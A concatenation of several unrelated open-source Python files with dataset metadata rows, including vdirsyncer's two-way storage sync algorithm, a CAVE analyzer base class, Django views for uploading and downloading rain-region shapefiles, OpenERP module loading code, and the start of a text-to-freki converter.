leftPos = sum(block_strlen[:self.marked_block])+self.marked_block
rightPos = sum(block_strlen[:(self.marked_block+1)])+self.marked_block
mBlock = range(leftPos, rightPos)
return value, mBlock
def getMulti(self, selected):
(value, mBlock) = self.genText()
if self.enabled:
return "mtext"[1-selected:], value, mBlock
else:
return "text", value
def getHTML(self, id):
# we definitely don't want leading zeros
return '.'.join(["%d" % d for d in self.value])
| gpl-2.0 | 3,419,506,302,964,417,000 | 25.720792 | 195 | 0.664166 | false |
untitaker/vdirsyncer | vdirsyncer/sync/__init__.py | 1 | 11708 | # -*- coding: utf-8 -*-
'''
The `sync` function in `vdirsyncer.sync` can be called on two instances of
`Storage` to synchronize them. Apart from the defined errors, this is the only
public API of this module.
The algorithm is based on the blogpost "How OfflineIMAP works" by Edward Z.
Yang: http://blog.ezyang.com/2012/08/how-offlineimap-works/
Some modifications to it are explained in
https://unterwaditzer.net/2016/sync-algorithm.html
'''
import contextlib
import itertools
import logging
from ..exceptions import UserError
from ..utils import uniq
from .status import SubStatus, ItemMetadata
from .exceptions import BothReadOnly, IdentAlreadyExists, PartialSync, \
StorageEmpty, SyncConflict
sync_logger = logging.getLogger(__name__)
class _StorageInfo(object):
'''A wrapper class that holds prefetched items, the status and other
things.'''
def __init__(self, storage, status):
self.storage = storage
self.status = status
self._item_cache = {}
def prepare_new_status(self):
storage_nonempty = False
prefetch = []
def _store_props(ident, props):
try:
self.status.insert_ident(ident, props)
except IdentAlreadyExists as e:
raise e.to_ident_conflict(self.storage)
for href, etag in self.storage.list():
storage_nonempty = True
ident, meta = self.status.get_by_href(href)
if meta is None or meta.href != href or meta.etag != etag:
# Either the item is completely new, or updated
# In both cases we should prefetch
prefetch.append(href)
else:
# Metadata is completely identical
_store_props(ident, meta)
# Prefetch items
for href, item, etag in (self.storage.get_multi(prefetch)
if prefetch else ()):
if not item.is_parseable:
sync_logger.warning(
'Storage "{}": item {} is malformed. '
'Please try to repair it.'
.format(self.storage.instance_name, href)
)
_store_props(item.ident, ItemMetadata(
href=href,
hash=item.hash,
etag=etag
))
self.set_item_cache(item.ident, item)
return storage_nonempty
def is_changed(self, ident):
old_meta = self.status.get(ident)
if old_meta is None: # new item
return True
new_meta = self.status.get_new(ident)
return (
new_meta.etag != old_meta.etag and # etag changed
# item actually changed
(old_meta.hash is None or new_meta.hash != old_meta.hash)
)
def set_item_cache(self, ident, item):
actual_hash = self.status.get_new(ident).hash
assert actual_hash == item.hash
self._item_cache[ident] = item
def get_item_cache(self, ident):
return self._item_cache[ident]
def sync(storage_a, storage_b, status, conflict_resolution=None,
force_delete=False, error_callback=None, partial_sync='revert'):
'''Synchronizes two storages.
:param storage_a: The first storage
:type storage_a: :class:`vdirsyncer.storage.base.Storage`
:param storage_b: The second storage
:type storage_b: :class:`vdirsyncer.storage.base.Storage`
:param status: {ident: (href_a, etag_a, href_b, etag_b)}
metadata about the two storages for detection of changes. Will be
modified by the function and should be passed to it at the next sync.
If this is the first sync, an empty dictionary should be provided.
:param conflict_resolution: A function that, given two conflicting item
versions A and B, returns a new item with conflicts resolved. The UID
must be the same. The strings `"a wins"` and `"b wins"` are also
accepted to mean that side's version will always be taken. If none
is provided, the sync function will raise :py:exc:`SyncConflict`.
:param force_delete: When one storage got completely emptied between two
syncs, :py:exc:`StorageEmpty` is raised for
safety. Setting this parameter to ``True`` disables this safety
measure.
:param error_callback: Instead of raising errors when executing actions,
call the given function with an `Exception` as the only argument.
:param partial_sync: What to do when doing sync actions on read-only
storages.
- ``error``: Raise an error.
- ``ignore``: Those actions are simply skipped.
- ``revert`` (default): Revert changes on other side.
'''
if storage_a.read_only and storage_b.read_only:
raise BothReadOnly()
if conflict_resolution == 'a wins':
conflict_resolution = lambda a, b: a
elif conflict_resolution == 'b wins':
conflict_resolution = lambda a, b: b
status_nonempty = bool(next(status.iter_old(), None))
with status.transaction():
a_info = _StorageInfo(storage_a, SubStatus(status, 'a'))
b_info = _StorageInfo(storage_b, SubStatus(status, 'b'))
a_nonempty = a_info.prepare_new_status()
b_nonempty = b_info.prepare_new_status()
if status_nonempty and not force_delete:
if a_nonempty and not b_nonempty:
raise StorageEmpty(empty_storage=storage_b)
elif not a_nonempty and b_nonempty:
raise StorageEmpty(empty_storage=storage_a)
actions = list(_get_actions(a_info, b_info))
storage_a.buffered()
storage_b.buffered()
for action in actions:
try:
action.run(
a_info,
b_info,
conflict_resolution,
partial_sync
)
except Exception as e:
if error_callback:
error_callback(e)
else:
raise
storage_a.flush()
storage_b.flush()
class Action:
def _run_impl(self, a, b): # pragma: no cover
raise NotImplementedError()
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
if self.dest.storage.read_only:
if partial_sync == 'error':
raise PartialSync(self.dest.storage)
elif partial_sync == 'ignore':
self.rollback(a, b)
return
else:
assert partial_sync == 'revert'
self._run_impl(a, b)
@contextlib.contextmanager
def auto_rollback(self, a, b):
try:
yield
except BaseException as e:
self.rollback(a, b)
raise e
def rollback(self, a, b):
a.status.parent.rollback(self.ident)
class Upload(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
href = etag = None
else:
sync_logger.info(u'Copying (uploading) item {} to {}'
.format(self.ident, self.dest.storage))
href, etag = self.dest.storage.upload(self.item)
assert href is not None
self.dest.status.insert_ident(self.ident, ItemMetadata(
href=href,
hash=self.item.hash,
etag=etag
))
class Update(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
meta = ItemMetadata(hash=self.item.hash)
else:
sync_logger.info(u'Copying (updating) item {} to {}'
.format(self.ident, self.dest.storage))
meta = self.dest.status.get_new(self.ident)
meta.etag = \
self.dest.storage.update(meta.href, self.item, meta.etag)
self.dest.status.update_ident(self.ident, meta)
class Delete(Action):
def __init__(self, ident, dest):
self.ident = ident
self.dest = dest
def _run_impl(self, a, b):
meta = self.dest.status.get_new(self.ident)
if not self.dest.storage.read_only:
sync_logger.info(u'Deleting item {} from {}'
.format(self.ident, self.dest.storage))
self.dest.storage.delete(meta.href, meta.etag)
self.dest.status.remove_ident(self.ident)
class ResolveConflict(Action):
def __init__(self, ident):
self.ident = ident
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
sync_logger.info(u'Doing conflict resolution for item {}...'
.format(self.ident))
meta_a = a.status.get_new(self.ident)
meta_b = b.status.get_new(self.ident)
if meta_a.hash == meta_b.hash:
sync_logger.info(u'...same content on both sides.')
elif conflict_resolution is None:
raise SyncConflict(ident=self.ident, href_a=meta_a.href,
href_b=meta_b.href)
elif callable(conflict_resolution):
item_a = a.get_item_cache(self.ident)
item_b = b.get_item_cache(self.ident)
new_item = conflict_resolution(item_a, item_b)
if new_item.hash != meta_a.hash:
Update(new_item, a).run(a, b, conflict_resolution,
partial_sync)
if new_item.hash != meta_b.hash:
Update(new_item, b).run(a, b, conflict_resolution,
partial_sync)
else:
raise UserError('Invalid conflict resolution mode: {!r}'
.format(conflict_resolution))
def _get_actions(a_info, b_info):
for ident in uniq(itertools.chain(a_info.status.parent.iter_new(),
a_info.status.parent.iter_old())):
a = a_info.status.get_new(ident)
b = b_info.status.get_new(ident)
if a and b:
a_changed = a_info.is_changed(ident)
b_changed = b_info.is_changed(ident)
if a_changed and b_changed:
# item was modified on both sides
# OR: missing status
yield ResolveConflict(ident)
elif a_changed and not b_changed:
# item was only modified in a
yield Update(a_info.get_item_cache(ident), b_info)
elif not a_changed and b_changed:
# item was only modified in b
yield Update(b_info.get_item_cache(ident), a_info)
elif a and not b:
if a_info.is_changed(ident):
# was deleted from b but modified on a
# OR: new item was created in a
yield Upload(a_info.get_item_cache(ident), b_info)
else:
# was deleted from b and not modified on a
yield Delete(ident, a_info)
elif not a and b:
if b_info.is_changed(ident):
# was deleted from a but modified on b
# OR: new item was created in b
yield Upload(b_info.get_item_cache(ident), a_info)
else:
# was deleted from a and not changed on b
yield Delete(ident, b_info)
| mit | -1,180,072,998,141,565,400 | 34.91411 | 78 | 0.562948 | false |
automl/SpySMAC | cave/analyzer/base_analyzer.py | 1 | 5492 | import logging
from collections import OrderedDict
from typing import Tuple
from bokeh.io import output_notebook
from bokeh.plotting import show
from cave.html.html_builder import HTMLBuilder
from cave.reader.runs_container import RunsContainer
from cave.utils.exceptions import Deactivated
class BaseAnalyzer(object):
"""
The base class for analyzing methods. To create a new analyzer, inherit from this class and extend.
If you already have an analyzer, but need a wrapper to call it, also inherit it from this class.
You should overwrite the "get_name"-method.
Currently the initialization calls the analysis. After the analyzer ran, the results should be saved to the member
self.result, which is a dictionary with a defined structure.
The docstrings (this part) will be used to display a tooltip / help for the analyzer, so it should be a descriptive
and concise small paragraph describing the analyzer and it's results.
Remember to call super.__init__(runscontainer) in your analyzer's __init__-method. This will initialize the logger,
name and important attributes.
All configurator data is available via the self.runscontainer.
"""
def __init__(self,
runscontainer: RunsContainer,
*args,
**kwargs):
"""
runscontainer: RunsContainer
contains all important information about the configurator runs
"""
self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)
self.name = self.get_name()
self.logger.debug("Initializing %s", self.name)
self.runscontainer = runscontainer
self.result = OrderedDict()
self.error = False
options = self.runscontainer.analyzing_options
if self.name not in options.sections():
self.logger.warning("Please state in the analyzing options whether or not to run this Analyzer "
"(simply add a line to the .ini file containing [{}])".format(self.name))
elif not options[self.name].getboolean('run'):
raise Deactivated("{0} has been deactivated in the options. To enable, just set "
"[{0}][run] = True in the .ini file or pass the appropriate flags.".format(self.name))
self.options = options[self.name]
for k, v in kwargs.items():
if v is not None:
self.options[k] = v
self.logger.debug("{} initialized with options: {}".format(self.name, str(dict(self.options))))
def plot_bokeh(self):
"""
This function should recreate the bokeh-plot from scratch with as little overhead as possible. This is needed to
show the bokeh plot in jupyter AND save it to the webpage. The bokeh plot needs to be recreated to be displayed
in different outputs for reasons beyond out control. So save all analysis results in the class and simply redo
the plotting with this function.
This function needs to be called if bokeh-plots are to be displayed in notebook AND saved to html-result.
"""
raise NotImplementedError()
def get_html(self, d=None, tooltip=None) -> Tuple[str, str]:
"""General reports in html-format, to be easily integrated in html-code. WORKS ALSO FOR BOKEH-OUTPUT.
Parameters
----------
d: Dictionary
a dictionary that will be later turned into a website
tooltip: string
tooltip to be displayed in report. optional, will overwrite the docstrings that are used by default.
Returns
-------
script, div: str, str
header and body part of html-code
"""
if len(self.result) == 1 and None in self.result:
self.logger.debug("Detected None-key, abstracting away...")
self.result = self.result[None]
if d is not None:
d[self.name] = self.result
d[self.name]['tooltip'] = tooltip if tooltip is not None else self.__doc__
script, div = HTMLBuilder("", "", "").add_layer(None, self.result)
combine = "\n\n".join([script, div])
return combine
def get_jupyter(self):
"""Depending on analysis, this creates jupyter-notebook compatible output."""
bokeh_plots = self.check_for_bokeh(self.result)
if bokeh_plots:
self.logger.warning("Bokeh plots cannot be re-used for notebook if they've already been \"components\"'ed. "
"To be sure, get_jupyter should be overwritten for bokeh-producing analyzers.")
output_notebook()
for bokeh_plot in bokeh_plots:
show(bokeh_plot)
else:
from IPython.core.display import HTML, display
display(HTML(self.get_html()))
@classmethod
def check_for_bokeh(cls, d):
"""
Check if there is bokeh-plots in the output of this analyzer by checking the result-dictionary for the bokeh
keyword.
"""
result = [] # all bokeh models
for k, v in d.items():
if isinstance(v, dict):
res = cls.check_for_bokeh(v)
if res:
result.extend(res)
if k == 'bokeh':
result.append(v)
return result
def get_name(self):
return self.__class__.__name__ # Back-up, can be overwritten, will be used as a name for analysis
| bsd-3-clause | -1,194,562,411,713,696,500 | 44.766667 | 120 | 0.628186 | false |
lizardsystem/lizard5-apps | lizard_rainapp/views.py | 1 | 5811 | # (c) Nelen & Schuurmans. GPL licensed, see LICENSE.rst.
# -*- coding: utf-8 -*-
"""Views for the RainApp, mostly a page to upload new region shapefiles."""
# Python 3 is coming
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import io
import logging
import operator
import os
import shutil
import tempfile
import zipfile
import shapefile
from django.contrib.gis.geos import GEOSGeometry
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views.generic import TemplateView
from django.views.generic import View
from lizard_ui.views import ViewContextMixin
from . import forms
from . import models
logger = logging.getLogger(__name__)
class AdminView(ViewContextMixin, TemplateView):
template_name = "lizard_rainapp/admin.html"
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(AdminView, self).dispatch(request, *args, **kwargs)
def get(self, request):
self.form = forms.UploadShapefileForm()
return super(AdminView, self).get(request)
def post(self, request):
self.form = forms.UploadShapefileForm(
request.POST, request.FILES)
if not self.form.is_valid():
return super(AdminView, self).get(request)
try:
self.save_shape()
finally:
self.form.clean_temporary_directory()
return HttpResponseRedirect(
reverse("lizard_rainapp_admin"))
def get_field(self, feature, fieldname, default=None):
try:
name = self.form.cleaned_data[fieldname]
return feature.GetField(
feature.GetFieldIndex(name.encode('utf8')))
except ValueError:
return default
def save_shape(self):
rainappconfig = self.form.cleaned_data['config']
# First, delete old data
models.GeoObject.objects.filter(
config=rainappconfig).delete()
shape = self.form.open_shapefile()
layer = shape.GetLayer()
num_features = 0
for feature in layer:
geom = feature.GetGeometryRef()
models.GeoObject.objects.create(
municipality_id=self.get_field(feature, 'id_field'),
name=self.get_field(feature, 'name_field'),
x=self.get_field(feature, 'x_field'),
y=self.get_field(feature, 'y_field'),
area=self.get_field(feature, 'area_field'),
geometry=GEOSGeometry(geom.ExportToWkt(), srid=4326),
config=rainappconfig)
num_features += 1
logger.debug("Added {} features.".format(num_features))
def rainapp_configs(self):
return models.RainappConfig.objects.all()
class DownloadShapeView(View):
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(DownloadShapeView, self).dispatch(
request, *args, **kwargs)
def get(self, request, slug):
try:
rainappconfig = models.RainappConfig.objects.get(
slug=slug)
except models.RainappConfig.DoesNotExist:
raise Http404()
if not rainappconfig.has_geoobjects:
raise Http404()
bytebuffer = self.save_data_to_zip(rainappconfig)
# Setup HTTPResponse for returning a zip file
response = HttpResponse(content_type='application/zip')
response['Content-Disposition'] = (
'attachment; filename={}.zip'.format(slug))
response.write(bytebuffer.read())
return response
def save_data_to_zip(self, rainappconfig):
# Save a shapefile to a temp directory
temp_dir = tempfile.mkdtemp()
try:
shapefile_path = os.path.join(
temp_dir, rainappconfig.slug)
shp = shapefile.Writer(shapefile.POLYGON)
shp.field(b'ID_NS')
shp.field(b'ID')
shp.field(b'X', b'F', 11, 5)
shp.field(b'Y', b'F', 11, 5)
shp.field(b'AREA', b'F', 11, 5)
for geo in models.GeoObject.objects.filter(config=rainappconfig):
if str(geo.geometry).startswith('MULTIPOLYGON'):
# For pyshp, multipolygons are basically normal
# polygons with all the parts after each other. Meaning
# we need to add them together them by hand.
geometry = [
[list(l) for l in polygon] for polygon in geo.geometry]
geometry = reduce(operator.add, geometry, [])
else:
geometry = [list(l) for l in geo.geometry]
shp.poly(parts=geometry)
shp.record(
geo.municipality_id,
geo.name,
geo.x,
geo.y,
geo.area)
shp.save(shapefile_path)
# Create a zipfile in a BytesIO buffer
bytebuffer = io.BytesIO()
zipf = zipfile.ZipFile(bytebuffer, 'w', zipfile.ZIP_DEFLATED)
for filename in os.listdir(temp_dir):
zipf.write(os.path.join(temp_dir, filename), filename)
zipf.close()
bytebuffer.seek(0)
return bytebuffer
finally:
# Remove temporary directory
shutil.rmtree(temp_dir)
| lgpl-3.0 | 6,633,258,897,341,782,000 | 31.646067 | 79 | 0.601101 | false |
mrshelly/openerp71313 | openerp/modules/loading.py | 1 | 19716 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules (also called addons) management.
"""
import itertools
import logging
import os
import sys
import threading
import openerp
import openerp.modules.db
import openerp.modules.graph
import openerp.modules.migration
import openerp.osv as osv
import openerp.pooler as pooler
import openerp.release as release
import openerp.tools as tools
from openerp import SUPERUSER_ID
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
from openerp.modules.module import initialize_sys_path, \
load_openerp_module, init_module_models
_logger = logging.getLogger(__name__)
def open_openerp_namespace():
# See comment for open_openerp_namespace.
if openerp.conf.deprecation.open_openerp_namespace:
for k, v in list(sys.modules.items()):
if k.startswith('openerp.') and sys.modules.get(k[8:]) is None:
sys.modules[k[8:]] = v
def load_module_graph(cr, graph, status=None, perform_checks=True, skip_modules=None, report=None):
"""Migrates+Updates or Installs all module nodes from ``graph``
:param graph: graph of module nodes to load
:param status: status dictionary for keeping track of progress
:param perform_checks: whether module descriptors should be checked for validity (prints warnings
for same cases)
:param skip_modules: optional list of module names (packages) which have previously been loaded and can be skipped
:return: list of modules that were installed or updated
"""
def process_sql_file(cr, fp):
queries = fp.read().split(';')
for query in queries:
new_query = ' '.join(query.split())
if new_query:
cr.execute(new_query)
load_init_xml = lambda *args: _load_data(cr, *args, kind='init_xml')
load_update_xml = lambda *args: _load_data(cr, *args, kind='update_xml')
load_demo_xml = lambda *args: _load_data(cr, *args, kind='demo_xml')
load_data = lambda *args: _load_data(cr, *args, kind='data')
load_demo = lambda *args: _load_data(cr, *args, kind='demo')
def load_test(module_name, idref, mode):
cr.commit()
try:
threading.currentThread().testing = True
_load_data(cr, module_name, idref, mode, 'test')
return True
except Exception:
_logger.exception(
'module %s: an exception occurred in a test', module_name)
return False
finally:
threading.currentThread().testing = False
if tools.config.options['test_commit']:
cr.commit()
else:
cr.rollback()
def _load_data(cr, module_name, idref, mode, kind):
"""
kind: data, demo, test, init_xml, update_xml, demo_xml.
noupdate is False, unless it is demo data or it is csv data in
init mode.
"""
for filename in package.data[kind]:
if kind == 'test':
_logger.log(logging.TEST, "module %s: loading %s", module_name, filename)
else:
_logger.info("module %s: loading %s", module_name, filename)
_, ext = os.path.splitext(filename)
pathname = os.path.join(module_name, filename)
fp = tools.file_open(pathname)
noupdate = False
if kind in ('demo', 'demo_xml'):
noupdate = True
try:
ext = ext.lower()
if ext == '.csv':
if kind in ('init', 'init_xml'):
noupdate = True
tools.convert_csv_import(cr, module_name, pathname, fp.read(), idref, mode, noupdate)
elif ext == '.sql':
process_sql_file(cr, fp)
elif ext == '.yml':
tools.convert_yaml_import(cr, module_name, fp, kind, idref, mode, noupdate, report)
elif ext == '.xml':
tools.convert_xml_import(cr, module_name, fp, idref, mode, noupdate, report)
elif ext == '.js':
pass # .js files are valid but ignored here.
else:
_logger.warning("Can't load unknown file type %s.", filename)
finally:
fp.close()
if status is None:
status = {}
processed_modules = []
loaded_modules = []
pool = pooler.get_pool(cr.dbname)
migrations = openerp.modules.migration.MigrationManager(cr, graph)
_logger.debug('loading %d packages...', len(graph))
# Query manual fields for all models at once and save them on the registry
# so the initialization code for each model does not have to do it
# one model at a time.
pool.fields_by_model = {}
cr.execute('SELECT * FROM ir_model_fields WHERE state=%s', ('manual',))
for field in cr.dictfetchall():
pool.fields_by_model.setdefault(field['model'], []).append(field)
# register, instantiate and initialize models for each modules
for index, package in enumerate(graph):
module_name = package.name
module_id = package.id
if skip_modules and module_name in skip_modules:
continue
_logger.info('module %s: loading objects', package.name)
migrations.migrate_module(package, 'pre')
load_openerp_module(package.name)
models = pool.load(cr, package)
loaded_modules.append(package.name)
if hasattr(package, 'init') or hasattr(package, 'update') or package.state in ('to install', 'to upgrade'):
init_module_models(cr, package.name, models)
pool._init_modules.add(package.name)
status['progress'] = float(index) / len(graph)
# Can't put this line out of the loop: ir.module.module will be
# registered by init_module_models() above.
modobj = pool.get('ir.module.module')
if perform_checks:
modobj.check(cr, SUPERUSER_ID, [module_id])
idref = {}
mode = 'update'
if hasattr(package, 'init') or package.state == 'to install':
mode = 'init'
if hasattr(package, 'init') or hasattr(package, 'update') or package.state in ('to install', 'to upgrade'):
if package.state=='to upgrade':
# upgrading the module information
modobj.write(cr, SUPERUSER_ID, [module_id], modobj.get_values_from_terp(package.data))
load_init_xml(module_name, idref, mode)
load_update_xml(module_name, idref, mode)
load_data(module_name, idref, mode)
if hasattr(package, 'demo') or (package.dbdemo and package.state != 'installed'):
status['progress'] = (index + 0.75) / len(graph)
load_demo_xml(module_name, idref, mode)
load_demo(module_name, idref, mode)
cr.execute('update ir_module_module set demo=%s where id=%s', (True, module_id))
# launch tests only in demo mode, as most tests will depend
# on demo data. Other tests can be added into the regular
# 'data' section, but should probably not alter the data,
# as there is no rollback.
if tools.config.options['test_enable']:
report.record_result(load_test(module_name, idref, mode))
# Run the `fast_suite` and `checks` tests given by the module.
if module_name == 'base':
# Also run the core tests after the database is created.
report.record_result(openerp.modules.module.run_unit_tests('openerp'))
report.record_result(openerp.modules.module.run_unit_tests(module_name))
processed_modules.append(package.name)
migrations.migrate_module(package, 'post')
ver = release.major_version + '.' + package.data['version']
# Set new modules and dependencies
modobj.write(cr, SUPERUSER_ID, [module_id], {'state': 'installed', 'latest_version': ver})
# Update translations for all installed languages
modobj.update_translations(cr, SUPERUSER_ID, [module_id], None)
package.state = 'installed'
for kind in ('init', 'demo', 'update'):
if hasattr(package, kind):
delattr(package, kind)
cr.commit()
# The query won't be valid for models created later (i.e. custom model
# created after the registry has been loaded), so empty its result.
pool.fields_by_model = None
cr.commit()
return loaded_modules, processed_modules
def _check_module_names(cr, module_names):
mod_names = set(module_names)
if 'base' in mod_names:
# ignore dummy 'all' module
if 'all' in mod_names:
mod_names.remove('all')
if mod_names:
cr.execute("SELECT count(id) AS count FROM ir_module_module WHERE name in %s", (tuple(mod_names),))
if cr.dictfetchone()['count'] != len(mod_names):
# find out what module name(s) are incorrect:
cr.execute("SELECT name FROM ir_module_module")
incorrect_names = mod_names.difference([x['name'] for x in cr.dictfetchall()])
_logger.warning('invalid module names, ignored: %s', ", ".join(incorrect_names))
def load_marked_modules(cr, graph, states, force, progressdict, report, loaded_modules, perform_checks):
"""Loads modules marked with ``states``, adding them to ``graph`` and
``loaded_modules`` and returns a list of installed/upgraded modules."""
processed_modules = []
while True:
cr.execute("SELECT name from ir_module_module WHERE state IN %s" ,(tuple(states),))
module_list = [name for (name,) in cr.fetchall() if name not in graph]
graph.add_modules(cr, module_list, force)
_logger.debug('Updating graph with %d more modules', len(module_list))
loaded, processed = load_module_graph(cr, graph, progressdict, report=report, skip_modules=loaded_modules, perform_checks=perform_checks)
processed_modules.extend(processed)
loaded_modules.extend(loaded)
if not processed: break
return processed_modules
def load_modules(db, force_demo=False, status=None, update_module=False):
# TODO status['progress'] reporting is broken: used twice (and reset each
# time to zero) in load_module_graph, not fine-grained enough.
# It should be a method exposed by the pool.
initialize_sys_path()
open_openerp_namespace()
force = []
if force_demo:
force.append('demo')
cr = db.cursor()
try:
if not openerp.modules.db.is_initialized(cr):
_logger.info("init db")
openerp.modules.db.initialize(cr)
tools.config["init"]["all"] = 1
tools.config['update']['all'] = 1
if not tools.config['without_demo']:
tools.config["demo"]['all'] = 1
# This is a brand new pool, just created in pooler.get_db_and_pool()
pool = pooler.get_pool(cr.dbname)
if 'base' in tools.config['update'] or 'all' in tools.config['update']:
cr.execute("update ir_module_module set state=%s where name=%s and state=%s", ('to upgrade', 'base', 'installed'))
# STEP 1: LOAD BASE (must be done before module dependencies can be computed for later steps)
graph = openerp.modules.graph.Graph()
graph.add_module(cr, 'base', force)
if not graph:
_logger.critical('module base cannot be loaded! (hint: verify addons-path)')
raise osv.osv.except_osv(_('Could not load base module'), _('module base cannot be loaded! (hint: verify addons-path)'))
# processed_modules: for cleanup step after install
# loaded_modules: to avoid double loading
report = pool._assertion_report
loaded_modules, processed_modules = load_module_graph(cr, graph, status, perform_checks=update_module, report=report)
if tools.config['load_language']:
for lang in tools.config['load_language'].split(','):
tools.load_language(cr, lang)
# STEP 2: Mark other modules to be loaded/updated
if update_module:
modobj = pool.get('ir.module.module')
if ('base' in tools.config['init']) or ('base' in tools.config['update']):
_logger.info('updating modules list')
modobj.update_list(cr, SUPERUSER_ID)
_check_module_names(cr, itertools.chain(tools.config['init'].keys(), tools.config['update'].keys()))
mods = [k for k in tools.config['init'] if tools.config['init'][k]]
if mods:
ids = modobj.search(cr, SUPERUSER_ID, ['&', ('state', '=', 'uninstalled'), ('name', 'in', mods)])
if ids:
modobj.button_install(cr, SUPERUSER_ID, ids)
mods = [k for k in tools.config['update'] if tools.config['update'][k]]
if mods:
ids = modobj.search(cr, SUPERUSER_ID, ['&', ('state', '=', 'installed'), ('name', 'in', mods)])
if ids:
modobj.button_upgrade(cr, SUPERUSER_ID, ids)
cr.execute("update ir_module_module set state=%s where name=%s", ('installed', 'base'))
# STEP 3: Load marked modules (skipping base which was done in STEP 1)
# IMPORTANT: this is done in two parts, first loading all installed or
# partially installed modules (i.e. installed/to upgrade), to
# offer a consistent system to the second part: installing
# newly selected modules.
# We include the modules 'to remove' in the first step, because
# they are part of the "currently installed" modules. They will
# be dropped in STEP 6 later, before restarting the loading
# process.
states_to_load = ['installed', 'to upgrade', 'to remove']
processed = load_marked_modules(cr, graph, states_to_load, force, status, report, loaded_modules, update_module)
processed_modules.extend(processed)
if update_module:
states_to_load = ['to install']
processed = load_marked_modules(cr, graph, states_to_load, force, status, report, loaded_modules, update_module)
processed_modules.extend(processed)
# load custom models
cr.execute('select model from ir_model where state=%s', ('manual',))
for model in cr.dictfetchall():
pool.get('ir.model').instanciate(cr, SUPERUSER_ID, model['model'], {})
# STEP 4: Finish and cleanup installations
if processed_modules:
cr.execute("""select model,name from ir_model where id NOT IN (select distinct model_id from ir_model_access)""")
for (model, name) in cr.fetchall():
model_obj = pool.get(model)
if model_obj and not model_obj.is_transient():
_logger.warning('The model %s has no access rules, consider adding one. E.g. access_%s,access_%s,model_%s,,1,1,1,1',
model, model.replace('.', '_'), model.replace('.', '_'), model.replace('.', '_'))
# Temporary warning while we remove access rights on osv_memory objects, as they have
# been replaced by owner-only access rights
cr.execute("""select distinct mod.model, mod.name from ir_model_access acc, ir_model mod where acc.model_id = mod.id""")
for (model, name) in cr.fetchall():
model_obj = pool.get(model)
if model_obj and model_obj.is_transient():
_logger.warning('The transient model %s (%s) should not have explicit access rules!', model, name)
cr.execute("SELECT model from ir_model")
for (model,) in cr.fetchall():
obj = pool.get(model)
if obj:
obj._check_removed_columns(cr, log=True)
else:
_logger.warning("Model %s is declared but cannot be loaded! (Perhaps a module was partially removed or renamed)", model)
# Cleanup orphan records
pool.get('ir.model.data')._process_end(cr, SUPERUSER_ID, processed_modules)
for kind in ('init', 'demo', 'update'):
tools.config[kind] = {}
cr.commit()
# STEP 5: Cleanup menus
# Remove menu items that are not referenced by any of other
# (child) menu item, ir_values, or ir_model_data.
# TODO: This code could be a method of ir_ui_menu. Remove menu without actions of children
if update_module:
while True:
cr.execute('''delete from
ir_ui_menu
where
(id not IN (select parent_id from ir_ui_menu where parent_id is not null))
and
(id not IN (select res_id from ir_values where model='ir.ui.menu'))
and
(id not IN (select res_id from ir_model_data where model='ir.ui.menu'))''')
cr.commit()
if not cr.rowcount:
break
else:
_logger.info('removed %d unused menus', cr.rowcount)
# STEP 6: Uninstall modules to remove
if update_module:
# Remove records referenced from ir_model_data for modules to be
# removed (and removed the references from ir_model_data).
cr.execute("SELECT id FROM ir_module_module WHERE state=%s", ('to remove',))
mod_ids_to_remove = [x[0] for x in cr.fetchall()]
if mod_ids_to_remove:
pool.get('ir.module.module').module_uninstall(cr, SUPERUSER_ID, mod_ids_to_remove)
# Recursive reload, should only happen once, because there should be no
# modules to remove next time
cr.commit()
_logger.info('Reloading registry once more after uninstalling modules')
return pooler.restart_pool(cr.dbname, force_demo, status, update_module)
if report.failures:
_logger.error('At least one test failed when loading the modules.')
else:
_logger.info('Modules loaded.')
# STEP 7: call _register_hook on every model
for model in pool.models.values():
model._register_hook(cr)
finally:
cr.close()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,239,214,771,103,827,000 | 44.116705 | 145 | 0.590028 | false |
xigt/freki | freki/text2freki.py | 1 | 6059 | from freki.serialize import FrekiDoc, FrekiBlock, FrekiLine
import codecs
import re
import chardet
import logging
import argparse
def run(args):
frek = read_and_convert(args.infile, args.igtfile, args.encoding, args.detect)
out = open(args.outfile, 'w', encoding='utf8')
out.write(str(frek))
def convert_text(doc_id, text, span_text=None):
"""
Convert a string to freki
:param doc_id: name of document
:param text: text of document
:param span_text: text identifying IGT spans, if available
:return: freki object
"""
w_index = 1
wo_index = 1
pre2post = {}
for line in re.split('\r\n|\n', text):
if not re.match('^\s*$', line):
pre2post[w_index] = wo_index
wo_index += 1
w_index += 1
line_dict = {}
s_index = 0
if span_text:
for line in span_text.split('\n'):
if len(line):
parts = line.split()
tags = parts[2:]
start = int(parts[0])
for i in range(start, int(parts[1]) + 1):
try:
num = pre2post[i]
except KeyError:
print("Warning: a line specified in the igt file is a blank line in the document. "
"Check the line numbers in the igt file. Skipping the problem line.")
break
